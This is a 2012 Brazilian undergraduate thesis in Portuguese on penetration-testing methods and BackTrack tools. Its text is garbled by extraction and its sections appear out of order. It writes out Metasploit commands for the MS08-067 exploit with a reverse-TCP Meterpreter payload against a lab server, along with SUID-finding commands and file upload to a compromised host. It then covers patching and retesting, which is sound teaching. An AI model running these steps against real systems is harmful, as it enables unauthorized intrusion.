27. CENTRO ESTADUAL DE EDUCA O TECNOL GICA PAULA SOUZA FACULDADE DE TECNOLOGIA DE LINS PROF ANTONIO SEABRA CURSO SUPERIOR DE TECNOLOGIA EM REDES DE COMPUTADOR JEAN KARL DA SILVEIRA MARIO FERNANDES TESTONI JUNIOR UM ESTUDO SOBRE T CNICAS E SOFTWARES PARA TESTES DE PENETRA O EM SERVIDORES DE REDE LINS SP 2 SEMESTRE 2012 CENTRO ESTADUAL DE EDUCA O TECNOL GICA PAULA SOUZA FACULDADE DE TECNOLOGIA DE LINS PROF ANTONIO SEABRA CURSO SUPERIOR DE TECNOLOGIA EM REDES DE COMPUTADOR JEAN KARL DA SILVEIRA MARIO FERNANDES TESTONI JUNIOR UM ESTUDO SOBRE T CNICAS E SOFTWARES PARA TESTES DE PENETRA O EM SERVIDORES DE REDE Trabalho de Conclus o de Curso apresentado Faculdade de Tecnologia de Lins para obten o do Titulo de Tecn logo em Redes de Computadores Orientador Prof Mestre Julio Fernando Lieira LINS SP 2 SEMESTRE 2012 JEAN KARL DA SILVEIRA MARIO FERNANDES TESTONI JUNIOR UM ESTUDO SOBRE TECNICAS E SOFTWARES PARA TESTES DE PENETRA O EM SERVIDORES DE REDE Trabalho de Conclus o de Curso apresentado Faculdade de Tecnologia de Lins como parte dos requisitos necess rios para a obten o do t tulo de Tecn logo em Redes de Computadores sob a orienta o do Prof Me Julio Fernando Lieira Data de aprova o 11 de dezembro de 2012 Orientador Prof Me Julio Fernando Lieira Prof Me Adriano Bezerra Prof Me Adriano De Souza Marques Dedico este trabalho a minha fa
28. ERVIDOR WEB LOCAL FUNCIONANDO Windows 2000 Server SPO E E Terminal 3 Mozilla Firefox Mozilla Firefox Figura 3 28 Acessando o servidor com firewall ativo Fonte elaborado pelos autores 2012 3 7 2 Configura o do Firewall Debian 6 05 Para o firewall foi utilizado uma maquina virtual criada no Virtual Machine da Oracle com HD dinamicamente alocado de 20GB memoria de 512MB e instalado o sistema Debian versao 6 05 Para que funcione como firewall foi criado um script somente com as configura es b sicas de firewall e adicionado as seguintes regras iptables t nat A PREROUTING i SIFACE EXT p tcp s 0 0 sport 1024265535 d SIPFW EXT dport 80 j DNAT to dest 192 168 55 2280 iptables A FORWARD i SIFACE EXT p tcp s 0 0 sport 1024 65535 d 192 168 55 2 dport 80 j ACCEPT 62 iptables A FORWARD m state state ESTABLISHED RELATED j ACCEPT A primeira redireciona as requisi es que chegarem pela interface externa do firewall utilizando o protocolo TCP vindos de qualquer lugar com destino ao IP externo do firewall e porta 80 para o P do servidor Web hospedado na maquina com Windows Server 2000 vulneravel porta 80 ou seja faz o redirecionamento de porta trocando o endere o da interface externa do firewall pelo endere o da interface do servidor Web hospedado no Windows Server 2000 A segunda libera os pacotes de pedidos de dados vindo da internet interface externa do firewall
29. T Ob 2012 11 07 03 06 23 0200 100777 rwxrwxrwx Baotfont hin Akh 2000 01 23 22 00 00 0900 INDAAA br ami mo Y Upload Make Directory List Drives Refresh i E root bt fe Armitage Figura 3 17 Arvore de arquivos do servidor invadido Fonte Elaborado pelos autores 2012 15 Enviando um arquivo ao servidor observe a pasta C do alvo antes do envio Disco local C Arquivo Editar Exibir Favoritos Ferramentas Ajuda e voltar E pesquisar MhPastas CBrist rico E X A En Endere o amp Disco local C E Disco local C Arquivos de Documents and Inetpub WINNT programas Settings Selecione um item para exibir sua descri o Capacidade 19 9 GB E Usado 2 24 GB O Livre 17 7 GB z 4 objeto s mais 2 ocultos 0 bytes is Meu computador gAiniciar E I pisco local C Bi 11 16 Figura 3 18 Pasta C do servidor Windows Fonte Elaborado pelos autores 2012 55 16 Crie um arquivo txt para enviar ao servidor invadido atrav s do Armitage N Applications Places System 7 r Wed Nov 7 11 17 AM 2 arquivo txt lt lt back track 5 root bt Armitage Figura 3 19 Criando arquivo txt no Backtrack Fonte Elaborado pelos autores 2012 17 De volta ao Armitage clicando em Upload abre se uma janela nela selecionar o arquivo criado para o envio Depois clicar em Open
30. a qualquer usu rio Isso ocorre devido a falha no sistema que interpreta o que o atacante digitou como informa es extra das do banco de dados ASSUN O 2010 Alguns sistemas limitam o n mero de caracteres na entrada de dados visando justamente dificultar os ataques mas mesmo assim ainda poss vel causar danos Neste caso a nica maneira de evitar este tipo de ataque testar seu programa e caso exista a falha atualiz lo ou substitu lo por um mais seguro ASSUN AO 2010 Como pudemos notar as t cnicas de penetra o s o dos mais variados tipos e exploram vulnerabilidades ainda mais diversas seria quase imposs vel esgotar o assunto neste trabalho portanto de extrema import ncia que o administrador da rede mantenha se sempre bem informado sobre novos tipos de ataque e de preven es para os mesmos 1 3 ELEVA O OU ESCALADA DE PRIVIL GIO De acordo com Vieira 2011 as t cnicas de escalada ou de eleva o de privil gios s o muito utilizadas quando o invasor j possui acesso ao servidor ou qualquer outro alvo ao qual deseja invadir Entretanto estar dentro do sistema n o o suficiente para que se consiga executar todos os ataques desejados j que algumas ferramentas e a es que o invasor necessita utilizar exigem privil gios de administrador como por exemplo a instala o de um software qualquer A eleva o ou escalada de privil gio nada mais do que tornar o usu rio comum no caso o invasor
31. a uma delas e para um conhecimento mais profundo recomendamos a leitura do documento na ntegra O NIST est dividido em basicamente sete se es e vale salientar que dentro do documento s o encontradas refer ncias a outras metodologias como o OWASP e OSSTMM por exemplo NIST 2008 Se es Teste de seguran a e vis o geral dos exames concentrado em tr s m todos de avalia o de seguran a da informa o para comprovar a efetividade das ferramentas s o elas testes exames e entrevistas Revis o das t cnicas discute as t cnicas para levantar as vulnerabilidades de seguran a com a realiza o de exames passivos nos sistemas aplica es procedimentos redes e pol ticas Identifica o do alvo e t cnicas de an lise foca em discutir as t cnicas para identifica o de dispositivos em atividade suas portas e servi os associados visando descobrir vulnerabilidades T cnicas de valida o das vulnerabilidades do alvo com base nas informa es obtidas na se o anterior esta se o explora a vulnerabilidade provando sua exist ncia e demonstrando os riscos existentes Planejamento de avalia es de seguran a esta se o orienta na cria o de pol ticas de testes selecionando as melhores abordagens gerenciando as considera es de log stica e priorizando as avalia es Execugao de avalia es de seguran a esta se o al m de chamar a aten o do auditor para pontos chaves durante
32. acktrack 5 Fonte Elaborado pelos autores 2012 Sabendo que neste caminho pode haver um firewall que bloqueia a porta User Datagram Protocol UDP que o padrao do Traceroute podemos usar algumas op es da ferramenta que permitem usar o protocolo ICMP ou utilizar o UDP com uma porta diferente do padr o a 53 por exemplo LIEIRA 2011 BACKTRACK 2012 Como contramedidas para evitar o Traceroute existem sistemas que detectam a intrus o e avisam quando o Traceroute foi utilizado para tra ar rota para as m quinas da rede existem ainda outros como o caso do tdetect o rotorouter que detectam e fazem log do Traceroute LIEIRA 2011 BACKTRACK 2012 1 1 4 Descobrindo Servi os em Execu o Finalmente depois de colhidas as informa es preliminares faremos a enumera o de servi os e informa es do servidor Esta t cnica consiste em realizar uma varredura nas portas Transmission Control Protocol TCP e UDP a fim de descobrir servi os ativos servi os em estado de listening servi os mal 22 configurados ou com versao de software que tenham alguma vulnerabilidade ja conhecida e que possam ser exploradas para a invasao LIEIRA 2011 Para a varredura de portas existem diversas t cnicas como por exemplo o TCP connect scan que faz um handshake completo ou seja abre conexao com cada porta do servidor alvo enviando um synchronize SYN o servidor caso esteja com o servi o TCP habilitado ir responder com u
33. ados abaixo podem ser utilizados para a execu o dessas fun es find perm 4000 gt suidroot txt less suidroot txt find perm 04000 exec ls 1 N Seguindo o mesmo raciocinio de Vieira 2011 os comandos citados acima podem ser utilizados para se localizar os arquivos suidroot das m quinas acessadas J se tratando de explorar eleva o de privil gio por falha no Kernel se varia muito de acordo com o sistema operacional da m quina atacada Dessa maneira se o servidor desta m quina possuir um Kernel cheio de falhas isso pode ser explorado dando ao invasor privil gio de administrador do sistema Estas falhas podem ser p blicas ou privadas As falhas p blicas ocorrem quando o software tem seu c digo aberto e suas informa es e falhas est o distribu das na internet em f runs em que administradores postam problemas detectados durante a sua rotina ou at mesmo alguns hackers que quando conseguem detectar alguma vulnerabilidade a postam para se promover dentro de sua comunidade J as falhas privadas diferem se das falhas p blicas pelo fato de que o software privado ou comprado de desenvolvedores para alguma aplica o espec fica n o t m seu c digo disponibilizado como os softwares de c digo aberto 27 para que sejam analisados esses softwares devem ser comprados ou obtidos de forma ilicita tornando um pouco mais complicado o trabalho dos hackers pois as falhas estao ocultas e para que suas vu
34. ala executados ao mesmo tempo em uma ou mais v timas destes ataques Os ataques de DDoS partem de in meras m quinas espalhadas pelo mundo controladas pelo invasor que por sua vez para conseguir executar esse ataque precisa invadir uma grande quantidade de m quinas interligadas pela internet quanto mais recursos tiver e mais robusto for o servidor atacado maior ser o n mero de m quinas normais atacando ao mesmo tempo para se realizar o DDosS Para se obter acesso as m quinas que realizar o o ataque necess rio Invadir in meras m quinas espalhadas pelos 4 cantos do mundo conectadas a internet sendo elas desktops laptops entre outras Realizar a eleva o de privil gios dando assim ao invasor o privil gio de super usu rio dessas m quinas Uma vez com privil gio de super usu rio executa se a instala o do software DDoS Seleciona se uma pequena quantidade de m quinas que passam mais tempo conectadas por seus administradores a internet para serem masters e as demais m quinas em uma quantidade muito maior que tamb m estejam conectadas a internet com links razoavelmente r pidos para se tornarem agentes respondendo a comandos das m quinas masters montando assim uma rede de m quinas dominadas prontas para realizar o ataque E por ltimo s realizar o ataque lan ando o flood inunda o de pacotes para uma ou mais m quinas escolhidas como v timas Este ataque efetivado quando o hacker manda um co
35. alho n o ocultar a invas o e sim testar a seguran a dos servidores para melhorar a seguran a e dificultar a intrus o esta etapa foi suprimida Entretanto vale salientar e alertar que caso um rootkit tenha instalado uma backdoor esta ficar invis vel para as ferramentas administrativas do sistema local podendo ser possivelmente detectada por meio de uma varredura de portas feita de uma outra m quina como mostrado na se o 3 1 1 3 1 6 Finalizando o teste Como este um teste para melhorar o n vel de seguran a em servidores e n o um ataque o passo final documentar todos os testes realizados e seus resultados mesmo que seja um teste feito pelo administrador em seus pr prios servidores Caso alguma vulnerabilidade tenha sido detectada a solu o para corrigi la deve constar na documenta o e para isso o administrador deve verificar com os fornecedores do software a exist ncia de corre es oficiais ou seja pacote de atualiza o que corrija esta falha Caso a mesma j exista basta atualizar o software e tudo estar resolvido por m se ainda n o houver corre o e for imposs vel impedir o ataque de outra forma h que se considerar suspens o do servi o at que se resolva o problema 3 2 ENTENDENDO O ARMITAGE O armitage uma interface gr fica dispon vel no Backtrack que facilita o uso da framework metasploit que por sua vez uma ferramenta automatizada que varre o servidor alvo em busca de vu
36. anco de Dados seguran a de banco de dados e engenharia social interessante ressaltar que apesar de extensa uma metodologia que sugere formas de evitar as vulnerabilidades que possam ser encontradas em fun o dos testes 2 3 OSSTMM A metodologia OSSTMM foi disponibilizada pelo Institute for Security and Open Methodologies ISECOM originalmente em dezembro de 2000 e com sua ltima vers o a de numero 3 0 publicada em dezembro de 2010 tornou se a metodologia mais atualizada e seu documento completo t m mais de 200 p ginas Projetada originalmente para ser uma metodologia consistente e que tenha resultados que possam ser reproduzidos baseada em conceitos de seguran a humana f sica sem fio de telecomunica es e de rede de dados ISECOM 2010 A realiza o de um teste utilizando essa metodologia garante que foram conduzidos completamente que a postura dos testes aplicados estavam de acordo com a legisla o que inclu ram todos os canais necess rios que os testes s o consistentes e reproduz veis que os resultados dos testes s o mensurados de forma quantific vel e que estes resultados cont m apenas fatos derivados dos pr prios testes ISECOM 2010 Um dos pontos positivos do OSSTMM que se for aplicado corretamente independente do tamanho da organiza o os resultados ser o relativamente compat veis isso se deve as chamadas regras de engajamento que s o divididas em 9 se es s o elas Vendas e
37. as neste trabalho 3 1 4 Explorando a Vulnerabilidade Nesta etapa ap s conhecer as vulnerabilidades existentes e qual exploit pode ser aplicado para tentar explor la e obter acesso ao servidor hora de aplic la Para a aplica o do exploit siga os seguintes passos 44 Abra um terminal no backtrack e digite o seguinte comando msfconsole na tela que se abre digite gt use exploit windows smb ms08 067 netapi Para usar o exploit ms08 067 netapi gt set RHOST 10 0 2 16 IP do servidor Windows gt set PAYLOAD windows meterpreter reverse tcp Especificando que ser utilizado o payload reverse tcp ele o respons vel por criar a comunica o entre LHOST e RHOST gt set LHOST 10 0 2 15 Informando o host local que no caso o endere o IP da VM com Backtrack gt exploit Executando o exploit Como pode ser verificado pela figura 3 2 foi feita a invas o e existe uma conex o entre o atacante Backtrack e o servidor Windows Applications Places System Sun Nov 11 10 03 PM x root bt se C root bt Figura 3 2 Resultado do Msfconsole no Backtrack 5 Fonte Elaborado pelos autores 2012 3 1 5 Consolidando a Invas o Este o passo final de uma invas o onde o invasor instala um rootkit item 1 4 que al m de ocultar sua invas o e dom nio da m quina tamb m abre uma 45 backdoor para que o atacante possa voltar a invadir quando quiser por m como o foco deste trab
38. aunching Exploits 10 0 2 16 80 multi http apprain_upload_exec Console X nmap X 1 Finding exploits via local magic 10 0 2 16 Found 124 exploits 2 Sorting Exploits 3 Launching Exploits 0 root bt Armitage Figura 3 25 Armitage tentando aplicar exploits no servidor Ubuntu Fonte Elaborado pelos autores 2012 59 Applications Places system P Sat Nov 10 5 42 PM x Armitage Armitage View Hosts Attacks Workspaces Help gt auxiliary exploit payload gt E post 10 0 2 16 Console X nmap X Hail Mary X 4 Listing sessions msf gt sessions v Active sessions No active sessions msf gt f root bt te Armitage Figura 3 26 Resultado da tentativa de invasao com exploits Fonte Elaborado pelos autores 2012 Isso nao significa necessariamente que um sistema melhor que o outro e nem esse o objetivo deste trabalho mas deve se observar que a m quina alvo 1 Windows no primeiro teste n o tinha sido atualizada com o pacote de atualiza es recomendado pelo desenvolvedor j no segundo teste com o sistema devidamente atualizado a falha foi corrigida e nenhuma vulnerabilidade conhecida foi detectada O sistema da m quina alvo 2 Ubuntu foi devidamente atualizado antes dos testes e portanto resistiu ao ataque n o mostrando vulnerabilidades conhecidas no teste com esta ferramenta Essa falta de atualiza o d
39. capacidade do analista e tamb m a efetividade dos controles do alvo Gray Box aqui o analista possui conhecimento limitado sobre os ativos e defesas e conhecimento total sobre os canais do alvo por outro lado o alvo tem conhecimento detalhado da auditoria Os testes depender o das informa es passadas ao analista e do conhecimento dele Double Gray Box neste caso o analista tem informa es limitadas sobre defesas e ativos e conhecimento total sobre os canais do alvo O alvo tem conhecimento da auditoria seu escopo e tempo entretanto n o sabe quais canais ser o testados Os testes depender o das informa es disponibilizadas ao analista e ao alvo bem como do conhecimento do analista Tandem neste tipo de teste tanto o analista quanto o alvo est o preparados e sabem detalhes da auditoria Este tipo de teste visa conhecer os controles do alvo e capacidade do analista entretanto ineficaz para o controle do alvo sobre vari veis desconhecidas Reversal neste caso o analista trabalha no alvo e tem conhecimento total de todos os seus processos e seguran a operacional Entretanto o alvo n o tem conhecimento sobre quando e o que ser testado Outro diferencial da metodologia OSSTMM refere se ao Risk Value Assessment RVA ou Avalia o do Valor de Risco um ndice utilizado para mensurar a seguran a Cada se o recebe um valor valor este que ser aplicado a uma f rmula pr definida para obter o RVA Este RVA utili
40. com 1024MB de mem ria disco r gido de 20GB dinamicamente alocado previamente atualizada interface de rede configurada como rede interna e P est tico 10 0 2 15 M quina alvo 1 Sistema operacional Microsoft Windows 2000 server criada em uma m quina virtual utilizando o Oracle Virtual Box com 1024MB de mem ria disco r gido de 20GB dinamicamente alocado sem instalar pacotes de atualiza o interface de rede configurada como rede interna e P est tico 10 0 2 16 M quina alvo 2 Sistema Linux Ubuntu 12 10 criada em uma m quina virtual utilizando o Oracle Virtual Box com 1024MB de mem ria disco r gido de 20GB 47 dinamicamente alocado previamente atualizada e configurada como servidor Web interface de rede configurada como rede interna e P estatico 10 0 2 17 3 4 PRIMEIRO TESTE UTILIZANDO O ARMITAGE Ap s a demonstra o e entendimento dos passos a serem seguidos passamos a aplica o pr tica do teste que visando minimizar o tempo gasto pelo administrador foi feita utilizando uma ferramenta nativa do Bactrack que como j explicado faz todo o processo de forma autom tica ou seja realiza o Nmap analisa as vulnerabilidades verifica no banco de dados quais exploits est o dispon veis para estas vulnerabilidades e faz sua aplica o esta ferramenta denominada Armitage Vale lembrar que um teste realizado de forma manual passo a passo pode obter um resultado mais preciso entretanto mais demorada e exige
41. como um usu rio root com todos os privil gios dentro do sistema dando a ele direitos e permiss es que antes n o possu a Entretanto esta eleva o ou escalada de privil gio n o se limita apenas aos sistemas operacionais pois englobam v rios outros sistemas como por exemplo conseguindo acesso ilimitado a um servidor de banco de dados dando privil gio de DataBase Administrator DBA que tornar o invasor capaz de executar v rias opera es dentro do banco como alterar excluir e criar tabelas 26 Ainda de acordo com Vieira 2011 existem varios servidores que nao exigem que o usu rio seja root para executar opera es Nesses servidores se tornam mais f ceis execu es da invas o nos casos de servidores que exigem o privil gio root como administrador podem ser executados ataque de Bruteforce tamb m conhecido como for a bruta assim como o nome j disse o ataque tenta de forma bruta conseguir acesso testando uma sequ ncia de poss veis usu rios e senhas daquele servidor at que uma d certo Segundo Vieira 2011 as aplica es mais exploradas s o as que possuem mais falhas no Kernel e tamb m aplica es que possuem suidroot ou seja aplica es que possuem uma permiss o especial que chamada de suid bit s Quando se consegue utilizar esta aplica o passa se a ter os mesmos privil gios que o root possui sobre o sistema Sendo assim adquire se controle total sobre o mesmo Alguns comandos como estes cit
42. d privil gios a seus usu rios corretamente e a possibilidade de aumentar de forma indevida tais permiss es Possui 3 testes Gerenciamento de sess o verifica se a aplica o Web controla e mant m o estado das intera es corretamente com o usu rio Possui cinco testes Validagao de dados verifica se os dados recebidos sao validados de forma correta Por ser essa uma das principais falhas de seguran a esta categoria possui dezesseis testes Nega o de servi o testa a resist ncia da aplica o a ataques que objetivam deix la indispon vel por algum tempo Possui oito testes Web services verifica se existem vulnerabilidades nos servi os que comp em a aplica o Possui sete testes Ajax verifica se a integridade proporcionada pela adi o de Ajax na aplica o Web n o esta acarretando novas vulnerabilidades Possui dois testes Por ser uma comunidade de filosofia aberta no que se refere a colabora o esta metodologia alcan ou um grau de credibilidade muito alto e atualmente uma das metodologias mais utilizadas tanto na fase de desenvolvimento quanto nos testes de sistemas em uso 40 3 APLICA O DA BACKTRACK EM TESTES DE PENETRA O DE SERVIDORES DE REDE Este capitulo mostra a aplica o pr tica do teste de penetra o utilizando a Backtrack 5 R3 e suas aplica es em servidores especialmente criados para este trabalho entretanto antes dos testes deve se deixar claro alguns po
43. e o icone do Windows e v at Meterprete 1 gt Explore gt Browse Files Wed Nov 7 11 16 AM auxiliary gt exploit gt payload gt post a Hos ot Console X nmap X Hail Mary X AR Id Type Information Connection via 1 meterpreter x86 win32 AUTORIDADE NT SYSTEM SERVIDOR GIGATR 10 0 2 15 46100 gt 10 0 2 16 26906 10 0 2 16 exploit windows smb ms08_067_netapi 2 meterpreter x86 win32 10 0 2 16 23629 10 0 2 16 exploit windows dcerpc ms03_026 dcom 10 0 2 15 58384 gt Meterpreter session 2 opened 10 0 2 15 58384 gt 10 0 2 16 23629 at 2012 11 07 11 15 45 00 gt root bt m Armitage Figura 3 16 Acessando o servidor invadido Fonte Elaborado pelos autores 2012 14 Observe a arvore de arquivos do PC Windows Utilizando desta vulnerabilidade pode se dominar o servidor Windows A Applications Places gt Wed Nov 7 11 16 AM 2 x Armitage gt auxiliary gt exploit payload gt post 10 0 2 16 Console X nmap X Hail Mary X Filesi x cA I D Name Size Modified Mode Arquivos de programas 2012 11 07 03 06 11 0200 40555 r xr xr x 4 Documents and Settings 2012 11 07 03 08 40 0200 40777 rwxrwxrwx Inetpub 2012 11 07 03 05 56 0200 40777 rwxrwxrwx System Volume Information 2012 11 07 03 08 07 0200 40777 rwxrwxrwx WINNT 2012 11 07 03 08 41 0200 40777 rwxrwxrwx AUTOEXEC BA
44. e realizado foi detectada uma vulnerabilidade a ja conhecida MS08 067 que aparece no resultado figura 3 1 como VULNERABLE O pr ximo passo sera explorar esta falha entretanto outras vulnerabilidades podem aparecer dependendo do tipo de servico oferecido pelo servidor por exemplo se existir um servi o Web e nele houver um formulario pode se acessar a pagina e tentar um SQLinjection como visto no capitulo 1 O importante nesta fase anotar as portas e servi os dispon veis bem como suas vers es pois as maiores vulnerabilidades est o exatamente em vers es desatualizadas dos servi os al m disso as vulnerabilidades ir o variar de acordo com a quantidade e tipo de servi os que estiverem ativos no servidor pesquisado Para descobrir quais as vulnerabilidades destes servi os e sistemas uma boa pesquisa em sites especializados e em f rum sobre o assunto pode ser uma boa alternativa entretanto cuidado para n o disponibilizar dados demais sobre o seu servidor em f rum pois exatamente a que invasores buscam por informa es sobre seus pr ximos alvos Para pesquisas sobre as poss veis vulnerabilidades de um sistema ou 43 servi o existem diversas fontes de consulta na internet por m deve se ter a maior cautela nessa busca pois como j dito anteriormente os invasores est o em toda parte e na ajuda gratuita pode estar o perigo Existem alguns sites que s o atualmente refer ncias seguras sobre vulnerabilidades
45. eal em que um invasor tamb m conectado a nuvem faria a tentativa de intrus o por m no ambiente de teste esta m quina foi conectada diretamente ao computador atacante Backtrack 5 3 7 1 Configura o da Rede de Testes Na sequ ncia foi configurada a rede para os testes da seguinte forma Na m quina atacante Backtrack a interface de rede foi configurada como host only e atribu do o IP 10 10 100 15 Na m quina Firewall Debian foram instaladas duas interfaces de rede a primeira eth0 foi configurada como host only atribu do IP 10 10 100 54 e colocada de frente para a internet ou seja como rede externa A segunda interface eth1 foi configurada como host only 2 e atribu do o IP 61 192 168 55 1 e na maquina alvo a interface foi configurada como host only 2 atribu do o IP 192 168 55 2 e conectada a eth1 da maquina Firewall Debian Ap s todas as configura es foram realizados alguns testes para confirmar o funcionamento da rede e do servidor Web O primeiro foi realizado na m quina atacante Backtrack visando acessar o site hospedado na m quina alvo note que o endere o digitado o do Firewall e n o do servidor Web o resultado pode ser observado na figura 3 28 tions Places System gt Mozilla Firefox iew History Bookmarks Tools Help e Edit View History B H _j http 10 10 100 54 8 1010 10054 vel Mr CW NS BackTrack Linux ffJOffensive Security KBExploit DB Aircrack ng jjSomaFM S
46. edure Call RPC e a segunda uma vulnerabilidade causada pelo servi o do servidor que n o controla corretamente as solicita es de RPC especialmente criadas Esse servi o roda por padr o diretamente na porta 445 sobre TCP atrav s da API NetBios Ambas j descobertas pelo fornecedor do software e constam em seu boletim de seguran a no endere o http technet microsoft com en us security bulletin ms03 026 e http technet microsoft com en us security bulletin ms08 067 onde se recomenda que o administrador deva instalar o aplicativo de corre o imediatamente 3 5 CORRIGINDO AS VULNERABILIDADES E REPETINDO OS TESTES Visando comprovar a efici ncia da solu o proposta pelo fornecedor do software usado no servidor alvo 1 uma atualiza o do mesmo foi realizada com o pacote service pack 4 e na sequ ncia os testes foram repetidos como pode ser notado pelas figuras 3 22 3 23 e 3 24 as vulnerabilidades foram corrigidas e n o foi possivel concretizar a invasao desta vez Geral identifica o de rede Hardware Perfis de usu rio Avan ado Sistema Microsoft Windows 2000 5 00 2195 Service Pack 4 Registrado para Gigatron e 52604 335 2574163 05479 Computador Intel R Core TM 5 CPU 670 3 47GHz AT AT COMPATIBLE 1 048 048 KB de RAM Cancelar liar ighiniciar Sa 8 S amd 21 16 Figura 3 22 Tela do sistema atualizado service pack 4 Fonte Elaborado pelos autores 2012
47. ersas ferramentas todavia como este trabalho est baseado no Backtrack 5 o Dnsmap foi escolhido por ser uma das ferramentas de linha de comando que faz parte de seu pacote de ferramentas A fun o desta ferramenta retornar com os endere os IP dos servidores que est o rodando algum tipo de servi o de frente para internet para o dom nio consultado a figura 1 1 mostra um exemplo de consulta DNS feita utilizando a ferramenta Dnsmap FAIRCLOTH 2011 BACKTRACK 2012 18 x root bt pentest enumeration dns dnsmap File Edit View Terminal Help pentest enumeration dns dnsmap dnsmap google com dnsmap 0 30 DNS Network Mapper by pagvac gnucitizen org searching sub domains for google com using built in wordlist using maximum random delay of 10 millisecond s between requests accounts google com IPv6 address 1 2607 f8b0 400c c03 54 accounts google com IP address 1 173 194 76 84 ap google com IPv6 address 1 2001 4860 4006 802 1012 ap google com IP address 1 IP address 2 IP address 3 IP address 4 IP address 5 74 125 229 114 74 125 229 115 74 125 229 116 74 125 229 113 74 125 229 112 blog google com IPv6 address 1 2607 f8b0 400c c03 bf blog google com IP address 1 173 194 76 191 Figura 1 1 Resultado da ferramenta Dnsmap no Backtrack 5 Fonte Elaborado pelos autores 2012 Como pode ser observado na figura 1 1 a consulta foi realizada ao servidor DNS do dom
48. es de rede a utiliza o de controladores de invent rios com verificadores de integridade dos arquivos em todas as m quinas detectando assim qualquer altera o de arquivos feita por algum rootkit Estes controladores enviam mensagens de alerta para o administrador toda vez que algum arquivo existente modificado Ulbrich e Valle 2004 alertam que apenas isso n o o suficiente pois notando essas atividades dos administradores os hackers desenvolveram rootkits com n vel mais elevado de camuflagem n o atacando os arquivos e programas e sim trocando o pr prio kernel do sistema operacional por outro totalmente adulterado obtendo assim um controle total do sistema a fim de utilizar isso de forma maliciosa para diversos tipos de ataque tais como Camullar os arquivos do invasor que neste caso quase impossivel de ser detectado pois os mesmos est o sendo executados pelo kernel alterado Camuflar conex es de rede alterando a funcionalidade de comandos utilizados como o exemplo o comando netstat que citamos acima modificando os seus resultados e impedindo assim que o administrador note portas abertas e trafego de dados realizado pelo invasor Neste caso podem ser detectados com sniffers rodando em outras maquinas dentro da rede Camuflar processos se torna mais f cil pois o kernel alterado gerencia todos os processos ativos do computador facilitando a oculta o dos programas infiltrados Redirecionamento onde o
49. ferramenta Traceroute no Backtrack 5 21 Figura 3 1 Resultado da ferramenta Nmap no Backtrack 5 42 Figura 3 2 Resultado do Msfconsole no Backtrack 5 44 Figura 3 3 Topologia da rede virtual de testes de Penetra o 46 Figura 3 4 Tela inicial do Backtrack 5 r3 47 Figura 3 5 Iniciando Armitage do Backtrack 5 r3 48 Figura 3 6 Tela inicial da Armitage no Backtrack 5 r3 48 Figura 3 7 Iniciando o Metaspoit no Backtarck 5 13 49 Figura 3 8 Conectando ao banco de Metasploit no Backtrack 5 r3 49 Figura 3 9 Tela inicial do Armitage no Backtrack 5 r3 50 Figura 3 10 Tela do Intensive Scan no Backtrack 5 r3 50 Figura 3 11 Campo de IP do Intensive Scan no Backtrack 5 r3 51 Figura 3 12 Tela final de Scam asas suu se cee ets cs e e eae a ana 51 Figura 3 13 Iniciando aplica o de Exploits 52 Figura 3 14 Aplicando EXOlONS saradas san cies es cn eet es eee eaten need da 52 Figura 3 15 Tela final de aplica o de Explois 53 Figura 3 16 Acessand
50. fica que o aplicativo esta aguardando que outro se conecte com ele 70 LOG o registro de atividades gerado por programas de computador No caso de logs relativos a incidentes de seguran a eles normalmente s o gerados por firewalls ou por DSs MALWARE Descri o gen rica geral para qualquer programa de computador que produza efeitos indesejados ou mal intencionados S o considerados malwares os v rus worms cavalos de tr ia e backdoors MD message digest Resumo de mensagem METASPLOIT Framework automatizada para varredura de vulnerabilidades e computadores bem como aplica o de exploit MODUS OPERANDI Express o em latim que significa modo de opera o Utilizada para designar uma maneira de agir operar ou executar uma atividade PAYLOAD C digo algoritmo malicioso que explora a vulnerabilidade e proporciona a invas o PHARMING M todo de ataque que redireciona o tr fego de um site normalmente desenvolvido para imitar o site leg timo O objetivo fazer com que os usu rios ignorem o redirecionamento e repassem informa es pessoais como senhas de bancos on line no site fraudulento O pharming pode ser praticado ao se alterar arquivos no computador da v tima ou explorando uma vulnerabilidade no software do servidor DNS PHISHING Golpe que usa spam e mensagens instant neas para levar pessoas a divulgarem informa es confidenciais como senhas de banco e dados de cart o
51. garantir prote o legal para os profissionais que realizar o os procedimentos bem como para a empresa que ser alvo dos testes para tanto deve ser firmado um termo de acordo de avalia o nesta etapa s o previstas as atividades de identifica o dos contatos individuais das partes metodologias e abordagem escopo e acordos dos casos espec ficos de testes e caminhos de escalonamento OISSG 2006 Avaliagao nesta etapa que de fato se realizam os testes de penetra o Esta etapa composta por 9 reas sendo coleta de informa es mapeamento da rede identifica o de vulnerabilidades penetra o obten o de acesso e escala o de privil gios enumera o comprometimento de s tios e usuarios remotos manuten o de acesso e encobrimento de rastros OISSG 2006 35 Relat rios e limpeza nesta fase sao disponibilizados os relat rios sobre os testes executados aos clientes entretanto se durante os testes alguma vulnerabilidade grave for encontrada esta deve ser imediatamente relatada ao cliente Ainda nesta fase devem ser excluidos todos os arquivos gerados no sistema alvo em consequ ncia dos testes e caso nao seja possivel remov los remotamente devem constar nos relat rios para que possam ser removidos posteriormente pelo contratante OISSG 2006 Objetivos Avaliar as pol ticas e processos de seguran a da empresa e verificar se n o ferem padr es regulamentos e leis Identificar
52. invasor implanta um programa nocivo semelhante a um programa existente no sistema e toda vez que o sistema operacional solicitar a execu o do verdadeiro programa o 29 kernel alterado vai redirecionar esse pedido ao programa modificado permitindo assim que toda vez que a integridade do programa original for testada nenhuma altera o ser encontrada Segundo Ulbrich e Valle 2004 a instala o de rootkits no kernel pode ser feita de duas maneiras uma delas mais utilizada pelos usu rios do sistema Windows conhecida como patch que funcionam de forma semelhante aos Hotfixes e Service Packs nativos do pr prio sistema operacional Eles alteram completamente ou partes dos arquivos fazendo com que eles respondam de forma diferente do que deveriam responder Para se instalar um rootkit no sistema operacional Windows um pouco mais trabalhoso mas n o muito dif cil j que o sistema possui v rias bibliotecas de v nculo din mico tamb m conhecidas por Dynamic link library DLL que s o acess veis aos usu rios n o exigindo prioridade de super usu rio para executar estas tarefas como a instala o de rootkits no kernel Os autores ainda afirmam que outra maneira mais preferida pelos usu rios da plataforma Unix instala o por m dulos carreg veis no Kernel Loadable Kernel Modules LKM que podem ser executados sobre demanda automaticamente ou remotamente pelo invasor atrav s de backdoors escondidos 1 5 ATAQUES DE NEGA
